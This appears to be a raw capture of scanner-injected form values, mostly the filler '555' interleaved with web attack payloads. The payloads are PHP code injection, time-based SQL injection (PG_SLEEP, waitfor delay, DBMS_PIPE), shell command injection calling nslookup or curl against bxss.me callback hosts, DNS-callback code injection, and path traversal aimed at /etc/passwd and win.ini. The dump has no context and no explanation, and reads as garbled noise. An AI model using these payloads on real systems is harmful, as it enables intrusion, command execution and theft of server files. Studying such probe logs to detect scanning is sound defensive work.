555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
[php]print(md5(31337));[/php]
555
{php}print(md5(31337));{/php}
555
555
print(md5(31337));//
555
'{${print(md5(31337))}}'
555
'.print(md5(31337)).'
555
555
555
555
${@print(md5(31337))}
555
${@print(md5(31337))}\
555
555
';print(md5(31337));$a='
";print(md5(31337));$a="
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555"||sleep(27*1000)*flqdlo||"
555'||sleep(27*1000)*lgtnht||'
555
'"()
555'&&sleep(27*1000)*roskoi&&'
555"&&sleep(27*1000)*zvarkw&&"
555
555
Array
555
Array
555
Array
555
555
555
Array
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
gethostbyname(lc('hitps'.'cnxgwjiib53a5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(68).chr(112).chr(74)
555
555
555
555
555
555
'.gethostbyname(lc('hitig'.'dpigagcm4c586.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(86).chr(117).chr(90).'
555
".gethostbyname(lc("hitjz"."paqjqued6a28b.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(71).chr(105).chr(72)."
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
555
555
555
555
555
!(()&&!|*|*|
555
555
redirtest.acx
555
555
555
555
555
555
555
555
555
555
555
@@egfwE
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
xfs.bxss.me
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555
555'"
555
555
555
555
555
555
555
555
555og54ysbl')) OR 218=(SELECT 218 FROM PG_SLEEP(15))--
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555
555
555
555-1)) OR 747=(SELECT 747 FROM PG_SLEEP(15))--
555
555
5556NYsco3p') OR 343=(SELECT 343 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555-1) OR 802=(SELECT 802 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555
555-1 OR 246=(SELECT 246 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555pm319wC1'; waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
555
555
555-1 waitfor delay '0:0:15' --
555
555
555
555
555-1); waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555-1; waitfor delay '0:0:15' --
555
555
'A'.concat(70-3).concat(22*4).concat(112).concat(67).concat(121).concat(73)+(require'socket' Socket.gethostbyname('hityq'+'ddiuispxe05f7.bxss.me.')[3].to_s)
555
555
555
555
555
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(121).concat(74).concat(101).concat(79)+(require"socket" Socket.gethostbyname("hitul"+"ukvgvrohcd1e4.bxss.me.")[3].to_s)+"
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
'+'A'.concat(70-3).concat(22*4).concat(112).concat(69).concat(116).concat(89)+(require'socket' Socket.gethostbyname('hiteh'+'eewxomzhbb999.bxss.me.')[3].to_s)+'
555
555
555
555
555*if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
555
555
-1' OR 2+239-239-1=0+0+0+1 or 'X7guEFog'='
555
555
555
555
555
-1" OR 2+238-238-1=0+0+0+1 --
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
-1' OR 2+817-817-1=0+0+0+1 --
555
bxss.me/t/xss.html?%00
-1 OR 2+85-85-1=0+0+0+1
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
bxss.me
555
-1 OR 2+222-222-1=0+0+0+1 --
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/shells
555
555
c:/windows/win.ini
555
555
555
555
555
555
555
555
555
555
555
555
555
http://bxss.me/t/fit.txt%3F.jpg
555
555
555
555
/etc/shells
555
555Lc8m1PFR
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
555
Http://bxss.me/t/fit.txt
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n970762=v993022
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../555
555
555
555
555
555
file:///etc/passwd
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
Array
555
555
555
555
12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'
${9999451+9999911}
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitdxzhcmbzhz539ce.bxss.me||curl${IFS}hitdxzhcmbzhz539ce.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitdxzhcmbzhz539ce.bxss.me||curl${IFS}hitdxzhcmbzhz539ce.bxss.me)&`'
555
555
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitaoscbpgjsx18c58.bxss.me||curl${IFS}hitaoscbpgjsx18c58.bxss.me)
;(nslookup -q=cname hitzkyvinpyjbc86f4.bxss.me||curl hitzkyvinpyjbc86f4.bxss.me)|(nslookup -q=cname hitzkyvinpyjbc86f4.bxss.me||curl hitzkyvinpyjbc86f4.bxss.me)&(nslookup -q=cname hitzkyvinpyjbc86f4.bxss.me||curl hitzkyvinpyjbc86f4.bxss.me)
555
555
|(nslookup -q=cname hitktewopmuhub8ed4.bxss.me||curl hitktewopmuhub8ed4.bxss.me)
555
`(nslookup -q=cname hitqhuqojgkmse5732.bxss.me||curl hitqhuqojgkmse5732.bxss.me)`
555
555
555
555
555
555
555
&(nslookup -q=cname hitpqmiwoihgb66a1a.bxss.me||curl hitpqmiwoihgb66a1a.bxss.me)&'\"`0&(nslookup -q=cname hitpqmiwoihgb66a1a.bxss.me||curl hitpqmiwoihgb66a1a.bxss.me)&`'
555
555
&nslookup -q=cname hitpxpkossznt5e854.bxss.me&'\"`0&nslookup -q=cname hitpxpkossznt5e854.bxss.me&`'
555
555
555
555
555
$(nslookup -q=cname hithacmueqvdi7da72.bxss.me||curl hithacmueqvdi7da72.bxss.me)
555
555
555|echo ktilmh$()\ tfctpu\nz^xyu||a #' |echo ktilmh$()\ tfctpu\nz^xyu||a #|" |echo ktilmh$()\ tfctpu\nz^xyu||a #
555
555
555
expr 9000353924 - 952745
(nslookup -q=cname hitixnptbcxbbfb6e2.bxss.me||curl hitixnptbcxbbfb6e2.bxss.me))
555&echo maigee$()\ dbokwp\nz^xyu||a #' &echo maigee$()\ dbokwp\nz^xyu||a #|" &echo maigee$()\ dbokwp\nz^xyu||a #
555
|echo naaagw$()\ hhcxrw\nz^xyu||a #' |echo naaagw$()\ hhcxrw\nz^xyu||a #|" |echo naaagw$()\ hhcxrw\nz^xyu||a #
555
555
555
echo exoqod$()\ tdbqnk\nz^xyu||a #' &echo exoqod$()\ tdbqnk\nz^xyu||a #|" &echo exoqod$()\ tdbqnk\nz^xyu||a #
&echo kekvcp$()\ zlhztr\nz^xyu||a #' &echo kekvcp$()\ zlhztr\nz^xyu||a #|" &echo kekvcp$()\ zlhztr\nz^xyu||a #
555
555
555
555
555
555
555
555
5559397069
555
555
555
555
555
555
555
555
'"()&%
555
555
555
555
555
555
555
555
555'"()&%
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
WtRbeHQu
JeOMl1BM: 5BT17f4o
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555